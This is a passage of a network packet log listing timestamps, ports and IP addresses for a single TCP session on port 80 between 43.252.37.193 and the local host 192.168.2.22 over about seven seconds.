Feb 4, 2021 09:05:32.151012897 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.151026011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.151036024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.151048899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.151058912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.151098967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.350619078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350645065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350665092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350677967 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350689888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350707054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350759029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.350760937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350801945 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.350816965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350842953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.350866079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.350903988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550080061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550113916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550137997 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550158978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550175905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550195932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550220013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550237894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.550353050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550447941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550457001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550462008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550546885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550558090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550565004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.550667048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.750449896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.750699043 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.751163006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.751183033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.751202106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.751251936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.751281977 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.751287937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.751472950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.751498938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.751542091 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.751560926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.949014902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949068069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949103117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949137926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949167013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949167967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.949197054 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.949203968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949207067 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.949240923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.949259996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.949285030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.951515913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149190903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149234056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149260998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149287939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149317026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149348021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149349928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.149410963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149420023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149441957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149447918 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.149452925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350121975 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350182056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350225925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350279093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350322008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350322962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350347042 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350349903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350352049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350367069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350368023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350408077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350413084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350446939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.350459099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.350507021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.549556017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.549757957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.550580978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.550676107 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.550756931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.550781965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.550816059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.550832987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.550873041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.550887108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.550911903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.550972939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.749078989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.749180079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.749272108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.749286890 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.749315023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.749317884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.749320984 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.749378920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.749445915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.749507904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948147058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948183060 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948195934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948219061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948236942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948254108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948271036 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:33.948358059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948415995 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948425055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948431015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948436022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948440075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:33.948445082 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.145817995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.145888090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.145927906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.145965099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.146006107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.146178961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.146241903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.146258116 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.148422956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.346101999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346137047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346159935 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346198082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346230030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346257925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.346359015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.347449064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.547137976 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547199965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547245026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547290087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547333956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547384977 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.547465086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.547518969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.745091915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.745152950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.745192051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.745229959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.745280027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.745332956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.745369911 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.942518950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.942550898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.942569017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.942584991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.942600965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:34.942797899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.942850113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.942857027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.942862988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:34.942867994 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.141340017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.141422987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.141433001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.141478062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.141505957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.141518116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.141555071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.141571045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.338324070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.338370085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.338417053 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.338449955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.338578939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.338614941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.338634968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.539299965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.539334059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.539360046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.539383888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.539458990 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.539509058 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.539515018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.738768101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.738796949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.738822937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.738846064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.738866091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.738887072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.739002943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.739059925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.936006069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.936044931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.936065912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.936085939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.936106920 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:35.936192036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.936228037 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.936233044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:35.936235905 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133153915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133208990 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133256912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133296013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133333921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133363962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.133414030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133466959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133474112 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133480072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133528948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.133537054 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.332276106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.332313061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.332336903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.332549095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.529603958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.529670000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.529710054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.529747963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.529823065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.529860020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.529861927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.529875040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.727271080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.727313995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.727463007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.727513075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.727871895 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.727974892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.926613092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.926655054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.926795006 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.926912069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.926942110 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:36.926964998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:36.927006006 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.123954058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.123985052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.124002934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.124022961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.124146938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.323709965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.323765039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.323805094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.323858976 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.324045897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.521042109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.521100998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.521141052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.521330118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.521445036 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.521538019 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.718844891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.718873978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.718887091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.718899965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.718935966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.718991041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.919657946 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.919694901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.919718027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.919739962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.919743061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.919765949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:37.919773102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.919778109 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.919781923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:37.919804096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.118077993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.118107080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.118119001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.118132114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.118385077 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.118438005 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.118442059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.121788025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.315931082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.315975904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.317207098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.320509911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.320561886 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.320811987 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.519153118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.519186974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.519309044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.522778988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.522809982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.522842884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.522874117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.717091084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.717123032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.717329979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.720514059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.720534086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.720643044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.720643044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.720662117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.720704079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.720719099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.914216042 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.914246082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.914479017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.917511940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.917541981 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.917562962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:38.917638063 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.917704105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:38.917712927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.112359047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.112472057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.117218971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.117265940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.117304087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.117322922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.117362022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.117382050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.117531061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.117645025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.317378998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.317439079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.317459106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.317591906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.318150997 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.318223000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.515510082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.515579939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.515619993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.515666962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.515841961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.515893936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.714219093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.714251041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.714268923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.714286089 CET	80	49165	43.252.37.193	192.168.2.22
